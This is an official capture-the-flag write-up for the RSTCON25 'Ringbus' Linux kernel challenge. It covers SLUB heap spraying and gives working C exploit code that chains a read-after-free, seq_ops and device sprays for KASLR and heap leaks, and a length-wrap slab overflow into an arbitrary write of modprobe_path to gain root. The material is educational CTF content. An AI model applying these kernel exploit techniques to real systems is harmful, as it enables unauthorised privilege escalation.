Post

Ringbus: Deferred Free Across Caches (Writeup)

Writing to modprobe using bad ring buffer handlers. Official writeup for my RSTCON25 challenge.

Ringbus: Deferred Free Across Caches (Writeup)

A writeup for the challenge I contributed to RSTCON25. The objective is to priv to root using kernel heap vulnerabilities, looping bugs, and heap spraying.

Table of contents

  1. Overview
  2. Module and Exploit Considerations
  3. Environment Setup
  4. A Quick Primer on SLUB Exploitation
  5. Primitive 1: Read-after-free
  6. Primitive 2: Type-Confusion to Overflow to AAW
  7. Scan Devices and Trigger
  8. Closing Thoughts

Overview

This is the official writeup for a kerenl challenge I developed for RSTCON 2025 including coverage of the module, environment setup, as well as a general overview of SLUB exploitation, incase this is an unfamiliar topic. As usual, the remote runs a kernel with the module loaded and the user must exploit this module to achieve root privileges. This challenge tests your ability in obtaining kernel and cache leaks from heap primitives and spraying a target object into place in addition to abusing other bugs to achieve an AAW. The module simulates a serial manager which stores configuration settings and offers functions for a list of devices. Notably you can add many devices, each which contain their own ring buffer which can be RX/TX to. The goal of this challenge is to build up a primitive to hijack modprobe_path. Provided in this post is the dist.tar incase you want to follow along. The module source is provided for this challenge.

Module and Exploit

Looking at the source provided in dist.tar reveals key information about the binary, considerations for exploitation, and a better overall picture as to what the module does and how it actually does it. Let’s go over some of the structures and handlers.

  • struct devices
    • Doubly linked list of struct uart_ring, the module uses this list to select (dev_select) and add (dev_new) devices.
  • struct uart_ring
    • Stores information about a device including a head, tail, and a seek used in TX/RX. It also includes usage metadata and options configurable by ioctls.
  • get/add
    • The former returns the uart_ring given the index, the latter adds a device at the end of the devices list.
  • rx_handle
    • Copies data from userspace into selected_dev->head the length copied is determined at runtime in the following manner:
      • If the lengh n, provided in write(,,n) is less than selected_dev->len, then n is used. It is also validated that selected_dev->len is less than RING_SIZE.
      • Otherwise, selected_dev->len is used as a fallback size.
  • tx_handle
    • Copies data from the selected device’s ring buffer into a userspace buffer, one byte at a time. This uses the seek attribute and will wrap back to the head if the end of the buffer is encountered. If the least significant nibble of t_setting for the selected device is enabled, a re-transmission mode will be enabled where TX will try on bytes that fail. Otherwise failed bytes will be skipped.
  • ioctl RST
    • Resets seek and marks the selected device as not in-use.
  • ioctl LEN_SET
    • Sets selected device’s length used for comparison (or as n) in rx_handle.
  • ioctl tx_setting
    • Sets selected_dev->t_setting.

That was quite a bit, but it is important to have atleast a general understanding of the module, the userspace interactions, and how it handles allocations with respect to the available userspace attack surface mappings. We know from this we are able to add an arbitrary amount of devices which allow us to read/write into allocations and in which the module itself decides whether to release a device or not. Knowing this, lets look at some of the deeper exploitation considerations that become apparent after looking at these functions and objects.

  • rx_handle does not wrap
    • Unlike tx_handle, rx_handle will not wrap to the head if seek goes out of bounds and instead trusts the prior length validations to be safe.
  • RST deferred free
    • RST marks the selected device as no longer inuse, but does not actually free it at this time. This is done later either when RST is called again, or when RX/TX is called.
  • Cache locations
    • Both devices and uart_ring->buf are stored in kmalloc-cg-32 while the uart_ring itself is allocated into kmalloc-cg-64. All allocations made by the program set GFP_KERNEL_ACCOUNT. It is important to know which caches interesting objects live in so that we are better prepared when we break the chains and start thrashing around in the SLABs.
  • tx_handle arbitrary looping
    • An arbitrary loop can be toggled in tx_handle causing the function to continuously copy_to_user. This is done by setting t_settings. Likewise, the loop can also be exited arbitrarily.
  • t_settings unsigned long and controllable
    • This attribute is an unsigned long type and entirely controllable, making it a perfect candidate for storing a fake address (such as for an AAW!). Recall, that this is a member of uart_ring so it lives in kmalloc-cg-64.

Keep these considerations in mind as we progress through our exploit. Next we’ll talk about environment setup, feel free to skip this section if you’ve done kernel challenges before.

Environment Setup

Unlike userspace binaries, for kernel modules we must emulate the kernel itself with the loaded target since bugs in our module can crash the kernel and the exploit primitives will heavily utilize kernelspace and kernel objects. The local environment you create for a kernel CTF is very similar to the environment being forked to you from the remote server. A local solve environment consists of a:

  • bzImage
    • The same kernel image being run on the remote. The image provided is non-stripped.
  • initramfs
    • The file system used by the emulation. Contains the target module and should have a modified /init to drop us in a root shell after booting. Here we can also mount a hostshare (which we will expose from qemu) so that we can directly access our exploits from our test environment without having to transfer our exploit each time.
  • A script that launches our qemu environment

From our launch script we can also toggle on and off mitigations such as nokaslr. The main thing we want in our testing environment is a way to be root (so we can read kallsyms) and a way to recompile and run our exploits without transferring it over the network. All you need to modify for this is /init in initramfs like so:

1
2
3
...
mkdir /mnt/hostshare && mount -t 9p -o trans=virtio hostshare /mnt/hostshare
exec su -l root

You will need a script to decompress and rebuild the filesystem respectively, with our changes to init. You are also able to open a debugging port on your qemu instance using -s. Combined with our non-stripped vmlinux (which can be obtained from our bzImage using online tools), we are able to launch a rooted qemu instance and debug it with symbols locally.

An example qemu launcher is given:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/bin/sh

qemu-system-x86_64 \
    -m 128M \
    -nographic \
    -kernel "./bzImage" \
    -append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on kaslr" \
    -no-reboot \
    -monitor none \
    -cpu qemu64,+smep,+smap \
    -initrd "./initramfs.cpio.gz" \
    -fsdev local,security_model=passthrough,id=fsdev0,path=./src \
    -device virtio-9p-pci,id=fs0,fsdev=fsdev0,mount_tag=hostshare \
    -s

pwndbg has some really easy to use slab commands, although they rely on symbols being present in your kernel.

A Quick Primer on SLUB Exploitation

Given that this challenge relies on heap vulnerabilities, I think it would be useful to quickly go over some SLUB exploitation, which is the SLAB-based allocator used by the Linux kernel. While a kernel heap sounds scary, I personally find it easier than userland glibc-based heap exploitation. SLAB allocators are based on type and size caches and lack the complex best-fit, first-fit, remaindering, and other complex search paths and chunk carving that userland heap does to most optimally service a request. The underlying system design differences between the two allocator choices is apparent, where userland programs may allocate complex and indeterminable program-specific objects, the kernel is almost always limited to objects from the kernel and its subsystems, this also helps avoid fragmentation.

Check out pwn.college’s series on kernel exploitation for some great resources on learning about slab allocators and the heap-specific protections in the linux kernel here.

In this short section, we will be discussing only some of allocator internals and exploitation techniques nessecary to complete this challenge. But below are some great resources I’ve found particularly helpful when it comes to kernel exploitation:

kmalloc caches

kmalloc returns locations from general-use caches, which are able to hold many different object types. While there are object-specific caches and caches that will be allocated to depending on the kmalloc flag, these general-use caches are used by all processes. Namely, caches are organized based on the sizes of their blocks (although as mentioned, dedicated caches are sorted based on other factors such as object similarity and isolation). For example, if I use a kernel object that is dynamically sized based on a custom attribute, it might live in the kmalloc-32 cache if its headers alone are less than 32 bytes. However, if I rewrite that attribute, that same object might live in kmalloc-512!

All slots for allocation in a cache slab are the fixed support size and no metadata is stored inline.

Furthermore, unlike glibc’s malloc, kmalloc does not go through a complex flow map of where to cite a freed block given a variety of freelists and instead, freed slots are simply pushed onto the head of a single, singly linked freelist. If you’re curious about the caches available for servicing allocation requests you can read /proc/slabinfo.

Heap Spraying

Like any allocator, SLUB is reliant on its fair share of heap mitigations. Some of these include safe linking on freed chunks pointers, verification on copy_to_user and copy_from_user to avoid OOB writes, and freelist randomization. The last one is particularly interesting to us as it results in allocation patterns like this since contiguous slots are not guaranteed to be returned.

This makes it particularly difficult to take advantage of use-after-free bugs, as we are not guaranteed the object we want, or anything at all, is residing in our victim chunk. Luckily, given the large amount of kernel objects available to us with their varying sizes, we can achieve many different exploitatable scenarios by simply mass-allocating a target object until they land in our UAFed slot. Some of these objects contain function pointers, kernel pointers, and cache pointers. List of useful kernel objects

Lastly, it is important to note that slabs for different caches do not live in adjacent memory, meaning I can’t spray into a region in kmalloc-64 given a allocations made into kmalloc-32 (atleast in simple scenarios, this can in fact be manually triggered, read more into the padding spray method of cross-cache attacks)

Primitive 1: Read-after-free

Now that we have a grasp on kernel heap exploitation, we can move on to our first primitive, which is a read-after-free. The first bug takes advantage of the deferred free in RST and the copy_to_user loop which can be triggered by setting the retransmission flag in selected_device->t_settings as mentioned earlier. A check is done at the beginning of the TX function to ensure the selected device has not been marked free by RST, but we are able to pass this check, trigger the loop, and then call RST on the device while it is still being read from. Specifically, we will continue reading from selected_device->buf (now freed) in a circular fashion. Note that to actually trigger the re-transmission loop, the setting has to be set in addition to the fact that the userspace address provided actually has to cause copy_to_user to fail. This could be done in a theoretically large number of ways such as by using mprotect, madvise, or by simply unmapping the buffer. We will use this vulnerability to leak a kernel address and a kmalloc-cg-64 address, thereby we will trigger it twice in our exploit.

Before proceeding, we need to add this new device to the module, select it, and configure it to fail.

1
2
3
4
5
6
7
8
9
10
11
char buf[64] = "Something";
leak_buf = malloc(0x1000);
long oob_dev; // used later

// Open and save fd
open_device();

// Device 1
// - Bad t_settings
fill_new_dev(buf);
ioctl(fd, TX_INSIST_MODE, 0x10);
  • leak_buf will be used going forward to read all leaks.
  • oob_dev will be used in the future for a different primitive.
  • fill_new_dev adds a device and then writes data to it (a device can only be read from after it has been written too atleast once).
  • The last ioctl will cause retransmission (0x10 & 0x1 != 1).

I chose to leak a kernel address first. It should not matter what order you decide for your leaks, just be sure to account for it in the remainder of the exploit. Spraying devices second is more convenient here because we use the sprayed devices to craft a later primitive. The vulnerability can be triggered in the same way and the only factor that will realistically change is what object you choose to spray into the freed slot.

seq_ops spray (Kernel Leak)

I chose to spray seq_ops to obtain the kernel leak. The first step to trigger this bug is to prepare our userspace leak_buf so that it is invalid or not writable, therefore causing copy_to_user to fail. We will then utilize a simple read thread to allow us to perform other interactions during the read loop. Here I simply use mprotect to remove permissions and then start the read thread.

1
2
3
4
5
// Disallow leak_buf so TX loop is triggered
mprotect(leak_buf, 0x1000, PROT_NONE);
puts("[*] Starting read thread against unmapped region");
// Read forever in a seperate thread
pthread_create(&read_tx, NULL, uaf_thread, NULL);

As mentioned, the thread simply does:

1
2
3
4
void *uaf_thread(void *arg) {
 printf("UAF Thread");
 read(fd, leak_buf, 0x1000);
}

Now that we are in a read loop, we can free selected_device->buf. In the main thread, we call RST twice. The first time marks buf as not in use, the second frees it because it is already marked. RX/TX are solely responsibly for later reallocating buf if it is not in-use. This gives us a read-after-free since we have already passed that point in the code. We can take advantage of this by spraying an object into kmalloc-cg-32 (recall buf is 32 bytes) until it lands in the freed slot and is eventually read back into leak_buf by the reader thread. I chose to spray with sequence_ops because it contains kernel points and lives in kmalloc-cg-32. Results of this clearly show that the proc_single_show symbol was leaked:

Below is the code for this leak:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
/**
* Leak KASLR address by:
* - Cause a TX loop
* - Trigger deferred free using RST
* - Spray with seq_ops (contains kernel ptr)
* - Unloop and parse tx buf
*/
void kaslr_leak(void){
    int spray[spray_size];
    // Disallow leak_buf so TX loop is triggered
    mprotect(leak_buf, 0x1000, PROT_NONE);
    puts("[*] Starting read thread against unmapped region");
    // Read forever in a seperate thread
    pthread_create(&read_tx, NULL, uaf_thread, NULL);
    sleep(1);
    // RST 1: Reset seek
    ioctl(fd, RST);
    // RST 2: free buf
    ioctl(fd, RST);
    puts("[+] Successfully RST");
    // Fill hole with seq_op (kmalloc-cg-32)
    puts("[*] seq_op spray");
    for(int i = 0; i < spray_size; i++){spray[i] = open("/proc/self/stat",
    O_RDONLY | O_NOCTTY);}
    // Hole filled with seq_op, end TX loop
    puts("[*] Re-mapping user buffer");
    mprotect(leak_buf, 0x1000, PROT_READ | PROT_WRITE);
    pthread_join(read_tx, NULL);
    modprobe_path = parse_leak_buf(kaslr_mask, kaslr_leak_index,
    modprobe_path_offset);
    // Free seq_ops
    for(int i = 0; i < spray_size; i++){close(spray[i]);}
}

device spray (kmalloc-cg-64 Leak)

To craft my final primitive I ended up also needing a kmalloc-cg-64 leak so that I am able to forge a fake uart_ring. To do this I use the same bug, but this time spray devices. Recall that devices are a doubly linked list of ring buffers so I will actually be leaking a uart_ring directly. This all re-occurs in the kmalloc-cg-32 cache, which is why I first free my seq_ops from the first leak. Furthermore, these sprayed devices will prove a useful target for a later primitive so I leave them after spraying.

Code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
/**
* Leak kmalloc-cg-64 address by:
* - Cause a TX loop
* - Trigger deferred free using RST
* - Spray with devices (next,prev ptrs)
* - Unloop and parse tx buf
*/
void cg_64_leak(void){
    // Start TX loop
    mprotect(leak_buf, 0x1000, PROT_NONE);
    pthread_create(&read_tx, NULL, uaf_thread, NULL);
    sleep(1);
    // RST race again
    ioctl(fd, RST);
    ioctl(fd, RST);
    ioctl(fd, RST);
    // Spray devices for kmalloc-cg-64 leak
    // Will also scan list later for AAW
    for(int i = 0; i < spray_size; i++)
    devices[i] = add_dev();
    // Hole filled with device, end TX loop
    puts("[*] Re-mapping user buffer");
    mprotect(leak_buf, 0x1000, PROT_READ | PROT_WRITE);
    pthread_join(read_tx, NULL);
    kmalloc_cg_64 = parse_leak_buf(cg_64_mask, cg_64_index,
    fake_head_offset);
}

Now we have all needed leaks.

Primitive 2: Type-Confusion to Overflow to AAW

Type Confusion

This vulnerability is within the RX functionality and relies on a type confusion between selected_device->len and the length ultimately chosen in rx_handle. It is then used to set a very large n argument to copy_from_user and overflow a 32-byte selected_device->buf. Below better illustrates the issue:

  1. length checks that dev->len is less than RING_SIZE-1. Recall that dev->len is set using an ioctl as a default signed int, but returned here as an unsigned long. A user can set dev->len beforehand so that it wraps to a negative value (ioctls take an unsigned long argument so you can’t pass a negative value explicitly, so you must also wrap the int when initially setting it), then when this function is called, the comparison will be passed and ret will equal some very large value since length returns a negative value as an unsigned long.
  2. Because ret is now very large, any len value passed via write will pass the dev->len comparison and be accepted.
  3. Our n argument from write(,,n) will be used to copy from userspace to kernelspace selected_dev->buf in kmalloc-cg-32. We can choose an arbitrary n and have very granular control as to the size of the overflow. We use it in the future to only write one address length out of bounds.

Slab Overflow

Recall the devices we sprayed into kmalloc-cg-32 for our first leak. These would prove excellent candidates to change because they’d let us change a device in the devices list to craft an arbitrary uart_ring. But do note that RX writes dev_selected->head. This means that the address we use should point 8 bytes ahead of an address we’d like to write too. The game plan is illustrated below:

As seen here, we take advantage of this overflow to craft the following AAW to overwrite modprobe_path. Using our uart_ring leak from earlier, we overwrite our (hopefully) adjacent device pointer so that it instead points to our leaked uart_ring+32 this will shift the device so that the t_setting is instead treated as the head which we will write too later. As mentioned earlier, t_setting is an unsigned long and we are able to set it, making it a perfect address holder. We opt here for the modprobe_path method to achieve root command execution. We should utilize this technique after ensuring all devices from the earlier spray are setup in such a way that allows us to use them in this manner since we do not know which device may be adjacent to our overflow. This scanning process brings us to the final section.

Scan Devices and Trigger

Given that we have no way of knowing which device or even if a device will be adjacent, the reliability concern of the exploit is finally raised here. Assuming we are not unlucky, we need to ensure that each device from the earlier spray is configured in such a way that it gives us our final primitive. So, we must set up and treat each device as if it is adjacent to our overflow in kmalloc-cg-32. Here, I simply save a device which I will use for the overflow primitive later, then I scan the saved devices from earlier, updating the length so that I can copy at least 64 bytes to the location, and the t_setting so that it points to our calculated modprobe_path.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/**
* Arbitrary Write
*/
oob_dev = add_dev();
// Configure all devices as if they landed adjacently to oob_dev
// - len = 64
// -- So we can RX plenty of data into uart_ring->head
// - t_setting = &modprobe_path
// -- This is so we can use t_setting as a fake uart_ring->head
for(int i = 0; i < spray_size; i++){
    select_dev(devices[i]);
    len_set(64);
    ioctl(fd, TX_INSIST_MODE, modprobe_path);
}

After this is complete, I can use the overflow, and then write my fake modprobe path to each device in the list.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
// Trigger length integer overflow
// - length() will return dev->len (int) as an unsigned long
// -- Magic number below will wrap so that dev->len is negative
// - Since arg0 (from write arg) < arg1 (len_set) arg0 is used
// - Can call write w/ arbitrary length argument
select_dev(oob_dev);
len_set(5368324604406717569);
// Payload
// - Padding
// -- Recall RING_SIZE = 32
// - Fake uart_ring
// -- Misalign uart_ring leak from earlier so that
// -- uart_ring->head points to t_settings (RX writes to head)
int offset = 32;
char payload[offset+8];
memset(payload, 0x41, offset);
memcpy(payload+offset, &kmalloc_cg_64, sizeof(kmalloc_cg_64));
write(fd, &payload, offset+8);
// Scan AAW
// - One of these devices is hopefully adjacent to oob_dev
// - Send "/tmp/e" to all devices until modprobe_path is overwritten
// - "/tmp/e" will be our fake modprobe binary
char * path = "/tmp/e";
for(int i = 0; i < spray_size; i++){
    select_dev(devices[i]);
    write(fd, path, 8);
}
// Hopefully that worked
// Attempt modprobe_path hijack
get_flag();

Final solve in action:

Closing Thoughts

Although I was directed to make a challenge that was embedded themed, I also really wanted to make my first kernel heap challenge, so I thank you for suspending disbelief and accepting that an embedded device would use a semi-recent kernel or (more obviously) a SLUB allocator. I designed this challenge to highlight some recurring themes one might find when doing vulnerability research in kernel modules such as bad lifetime management (deferred frees + race windows) compound into powerful primitives when paired with general allocator exploitation techniques such as heap spraying. The intentional exploit path here, was intentionally layered and sequential, leak, spray, type confusion, overflow, and finally AAW.

Some other exploitation scenarios to consider (and perhaps try, reach out if you do), could entail only using the first leak primitive. One could break safe linking by both reading an fd and a NULL fd in the same slab, allowing one to link a fake block. Furthermore, a player also made me aware of how they were able to use solely the first primitive by causing a kernel panic to leak the flag (initramfs is scannable in memory with qemu). Below is that conversation.

If you enjoyed this challenge, you may like digging into:

  • Looking at some real CVEs in linux subsystems, alot of which utilize heap spraying.
  • pwn.college’s kernel exploitation material.
  • More interesting writeups that touch on bypassing other mitigations and cross-cache attacks.

Good luck and happy pwns!

This post is licensed under CC BY 4.0 by the author.